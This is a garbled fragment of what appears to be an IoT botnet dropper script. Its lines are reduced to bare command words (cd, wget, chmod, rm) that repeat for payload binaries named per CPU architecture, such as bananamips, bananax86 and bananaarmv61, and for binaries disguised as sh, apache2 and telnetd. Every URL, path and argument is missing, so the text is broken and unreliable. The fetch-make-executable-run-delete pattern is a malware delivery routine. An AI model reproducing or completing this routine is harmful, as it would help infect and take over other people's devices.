cd
cd
cd
cd
cd
wget
chmod
bananamips
rm
cd
cd
cd
cd
cd
wget
chmod
bananamipsel
rm
cd
cd
cd
cd
cd
wget
chmod
bananash4
rm
cd
cd
cd
cd
cd
wget
chmod
bananax86
rm
cd
cd
cd
cd
cd
wget
chmod
bananaarmv61
rm
cd
cd
cd
cd
cd
wget
chmod
bananai686
rm
cd
cd
cd
cd
cd
wget
chmod
bananapowerpc
rm
cd
cd
cd
cd
cd
wget
chmod
bananai586
rm
cd
cd
cd
cd
cd
wget
chmod
bananam68k
rm
cd
cd
cd
cd
cd
wget
chmod
sh
rm
cd
cd
cd
cd
cd
wget
chmod
 
rm
cd
cd
cd
cd
cd
wget
chmod
apache2
rm
cd
cd
cd
cd
cd
wget
chmod
telnetd
rm
